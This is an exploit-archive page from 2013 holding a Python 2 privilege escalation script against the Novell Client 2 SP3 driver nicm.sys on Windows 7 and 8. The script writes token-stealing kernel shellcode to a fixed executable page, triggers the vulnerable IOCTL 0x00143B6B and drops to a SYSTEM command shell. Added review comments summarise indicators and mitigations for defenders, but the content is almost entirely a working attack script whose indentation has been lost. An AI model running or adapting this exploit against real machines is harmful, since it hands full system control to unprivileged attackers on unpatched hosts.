
Novell Client 2 SP3 Privilege Escalation

🗓️ 29 Jul 2013 00:00:00Reported by sicknessType 

Novell Client 2 SP3 Privilege Escalation on Windows 7 and 8

Code
`# Novell Client 2 SP3 Privilege escalation exploit  
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0  
# Thanks to Master Ryujin :)  
  
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure whether there was anything else public)  
# Exploit for DEMO purposes :)  
# Does not bypass SMEP on Windows 8  
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/  
  
# NOTE(review): this listing is a historical record of the issue and is kept
# byte-for-byte. As extracted it has lost its indentation (everything after the
# `if __name__ == '__main__':` line sits at column 0) and it is Python 2 code
# (`print` statements, `str` used as a byte buffer), so it does not parse as
# shown under Python 3.
#
# Defender's summary, limited to what the visible calls show:
#   1. the script opens the device object DEVICE (`\\.\nicm`, i.e. nicm.sys),
#   2. maps a user-mode page at the fixed address 0x0d0d0000 and copies
#      `kernel_sc` into it,
#   3. sends IOCTL 0x00143B6B (labelled "Vulnerable IOCTL" below) to the
#      driver and then spawns cmd.exe.
# The device name and the IOCTL code are the concrete indicators to look for
# in driver-call telemetry; the remediation is the vendor's fixed driver (the
# patched nicm.sys version is not named on this page).
from ctypes import *  
import sys,struct,os  
from optparse import OptionParser  
  
kernel32 = windll.kernel32  
ntdll = windll.ntdll  
  
if __name__ == '__main__':  
  
# Target build is chosen with -o; only WIN7 and WIN8 are accepted, anything
# else prints the usage text and exits.
usage = "%prog -o <target>"  
parser = OptionParser(usage=usage)  
parser.add_option("-o", type="string",  
action="store", dest="target_os",  
help="Available target operating systems: WIN7, WIN8")  
(options, args) = parser.parse_args()  
OS = options.target_os  
if not OS or OS.upper() not in ['WIN7','WIN8']:  
parser.print_help()  
sys.exit()  
OS = OS.upper()  
  
if OS == "WIN7":  
# Four single-byte kernel structure offsets. They are specific to the x86
# Windows 7 build the author tested and differ from the Windows 8 set below.
_KPROCESS = "\x50" # Offset for Win7  
_TOKEN = "\xf8" # Offset for Win7  
_UPID = "\xb4" # Offset for Win7  
_APLINKS = "\xb8" # Offset for Win7  
  
# Kernel-mode payload assembled from raw machine-code bytes with the offsets
# above spliced in; the author's variable name states its purpose.
steal_token = "\x52" +\  
"\x53" +\  
"\x33\xc0" +\  
"\x64\x8b\x80\x24\x01\x00\x00" +\  
"\x8b\x40" + _KPROCESS +\  
"\x8b\xc8" +\  
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\  
"\x89\x1d\x00\x09\x02\x00" +\  
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\  
"\x75\xe8" +\  
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\xc1" +\  
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x5b" +\  
"\x5a" +\  
"\xc2\x08"  
  
sc = steal_token   
  
else:  
# Same four offsets for the x86 Windows 8 build the author tested.
_KPROCESS = "\x80" # Offset for Win8  
_TOKEN = "\xEC" # Offset for Win8  
_UPID = "\xB4" # Offset for Win8  
_APLINKS = "\xB8" # Offset for Win8  
  
# Windows 8 variant of the payload; same construction, different offsets.
steal_token = "\x52" +\  
"\x53" +\  
"\x33\xc0" +\  
"\x64\x8b\x80\x24\x01\x00\x00" +\  
"\x8b\x80" + _KPROCESS + "\x00\x00\x00"+\  
"\x8b\xc8" +\  
"\x8b\x98" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\x80" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xe8" + _APLINKS + "\x00\x00\x00" +\  
"\x81\xb8" + _UPID + "\x00\x00\x00\x04\x00\x00\x00" +\  
"\x75\xe8" +\  
"\x8b\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x8b\xc1" +\  
"\x89\x90" + _TOKEN + "\x00\x00\x00" +\  
"\x5b" +\  
"\x5a" +\  
"\xc2\x08"  
  
sc = steal_token  
  
  
# Buffer that ends up in the page at 0x0d0d0000 and is referenced by the IOCTL
# below. The little-endian dwords 0x0d0d0014 / 0x0d0d0018 / 0x0d0d0028 point
# back into that same fixed page; the payload `sc` is appended at the end.
kernel_sc = "\x14\x00\x0d\x0d"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x18\x00\x0d\x0d"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x41\x41\x41\x41"  
kernel_sc+= "\x28\x00\x0d\x0d"  
kernel_sc+= sc  
  
  
print "[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."  
print "[>] Finding the driver."  
  
GENERIC_READ = 0x80000000  
GENERIC_WRITE = 0x40000000  
OPEN_EXISTING = 0x3  
# The vulnerable driver's device object. For this to be a *local privilege
# escalation* an unprivileged caller must be able to open it read/write;
# presumably the device's DACL allowed that on the affected versions — confirm
# against the driver. Restricting who may open the device is, together with the
# fix in the IOCTL handler, the hardening lever.
DEVICE = '\\\\.\\nicm'  
  
device_handler = kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)  
EVIL_IOCTL = 0x00143B6B # Vulnerable IOCTL  
retn = c_ulong()  
  
# DeviceIoControl is handed the raw address 0x0d0d0000 (not a ctypes buffer)
# as its 0x14-byte input, and no output buffer.
inut_buffer = 0x0d0d0000  
inut_size = 0x14  
output_buffer = 0x0  
output_size = 0x0  
  
baseadd = c_int(0x0d0d0000)  
  
# 0x1000 | 0x2000 is MEM_COMMIT | MEM_RESERVE; 0x40 is PAGE_EXECUTE_READWRITE.
MEMRES = (0x1000 | 0x2000)  
PAGEEXE = 0x00000040  
Zero_Bits = c_int(0)  
RegionSize = c_int(0x1000)  
write = c_int(0)  
  
# Mitigation note: the payload lives in a user-mode, executable page. SMEP,
# where present (Windows 8 on capable CPUs), stops the kernel from executing
# such a page — which is the caveat in the header.
print "[>] Allocating memory for our shellcode."  
dwStatus = ntdll.NtAllocateVirtualMemory(-1, byref(baseadd), 0x0, byref(RegionSize), MEMRES, PAGEEXE)  
print "[>] Writing the shellcode."  
kernel32.WriteProcessMemory(-1, 0x0d0d0000, kernel_sc, 0x1000, byref(write))  
  
if device_handler:  
print "[>] Sending IOCTL to the driver."  
dev_io = kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn), None)  
  
# Spawns a shell from the same process; a SYSTEM prompt here is the success
# indicator the author relies on.
print "[>] Dropping to a SYSTEM shell."  
os.system("cmd.exe /K cd C:\\windows\\system32")  
  
  
`

